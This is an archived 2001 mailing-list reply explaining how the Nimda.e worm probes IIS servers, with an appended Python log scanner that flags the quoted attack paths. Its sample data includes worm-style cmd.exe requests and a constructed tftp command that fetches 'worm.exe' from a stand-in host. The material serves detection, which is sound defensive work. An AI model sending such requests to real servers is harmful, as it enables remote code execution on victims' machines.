Re: New Worm Variant?

From: Ryan Russell (ryanat_private)
Date: Tue Oct 30 2001 - 09:08:42 PST


On Mon, 29 Oct 2001, Aj Effin Reznor wrote:
> [29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 200 394 "-" "-"
> [29/Oct/2001:17:09:11 -0800] "GET
> HTTP/1.0" 200 449 "-" "-"
> [29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330
> "-" "-"

As someone pointed out, this is Nimda.e.  What's going on here is that
since your web server is responding with a 200 to the exploit attempt, it
thinks it has found a vulnerable victim.  So it issues the tftp command to
try and make your web server download a copy.  Then it sends a command to
try to execute the file it thinks it has caused you to download.

This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see:
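The point Ryan makes is that the status code, not the request alone, decides what the worm does next: a 404 is a probe that went nowhere, a 200 tells the worm it has a foothold and the tftp stage follows. The script below is an added example (not part of the original thread or of any SecurityFocus tool) that applies that reasoning to access-log lines of the shape quoted above. It only flags the two paths that appear in the thread (cmd.exe and MSADC/httpodbc.dll), rates a 200 answer as high and anything else as informational, and notes when the query part of a cmd.exe request carries a tftp follow-up. The log lines in SAMPLE_LOG are constructed to resemble the quoted ones (including a made-up tftp stage with a documentation-range address) and are not real captures; the function and field names are my own.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed sample lines modelled on the ones quoted in the thread:
# Apache-style "[time] "request" status size "referer" "agent"" with no
# client host field.  Line 3 is a made-up follow-up stage; 198.51.100.7 is
# a documentation address, not a real worm source.
SAMPLE_LOG = """\
[29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-" "-"
[29/Oct/2001:17:09:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp+-i+198.51.100.7+GET+worm.exe HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:10:01 -0800] "GET /index.html HTTP/1.0" 200 1024 "-" "-"
"""

# Request paths quoted in the thread.  Matched case-insensitively against
# the request target (path plus query string).
INDICATORS = (
    ("cmd.exe", "command interpreter reachable through a web path"),
    ("httpodbc.dll", "MSADC httpodbc.dll probe"),
)

LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/\d\.\d))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


@dataclass
class Finding:
    timestamp: str
    target: str
    status: int
    indicator: str
    severity: str  # "high": server answered 200; "info": probe refused


def parse_line(line: str) -> Optional[dict]:
    """Split one access-log line into its fields, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(line: str) -> Optional[Finding]:
    """Return a Finding for a worm-style request, or None for anything else."""
    rec = parse_line(line)
    if rec is None:
        return None
    target = rec["target"].lower()
    for needle, label in INDICATORS:
        if needle in target:
            break
    else:
        return None  # not one of the paths quoted in the thread
    # The thread's point: the worm only escalates when the server says 200.
    status = int(rec["status"])
    if "tftp" in target:
        label += "; tftp follow-up stage attempted"
    severity = "high" if status == 200 else "info"
    return Finding(rec["ts"], rec["target"], status, label, severity)


def scan(log_text: str) -> list:
    """Classify every line of a log dump, dropping lines that are not findings."""
    return [f for f in (classify(ln) for ln in log_text.splitlines()) if f]


def summarize(findings: list) -> dict:
    """Count findings by severity, e.g. {'high': 2, 'info': 1}."""
    return dict(Counter(f.severity for f in findings))


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f.severity:<4} {f.timestamp} {f.status} {f.target}  ({f.indicator})")
    print("summary:", summarize(results))
```

A "high" line is the case the thread describes: the server returned 200 to a request it should never have served, so the worm treats the host as compromised and moves on to the download and execute stages. Checking what that 200 actually came from (a catch-all handler, a custom error page that returns 200, or a genuinely exposed interpreter) is the follow-up a defender wants before deciding the host is clean.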

This archive was generated by hypermail 2b30 : Tue Oct 30 2001 - 09:41:08 PST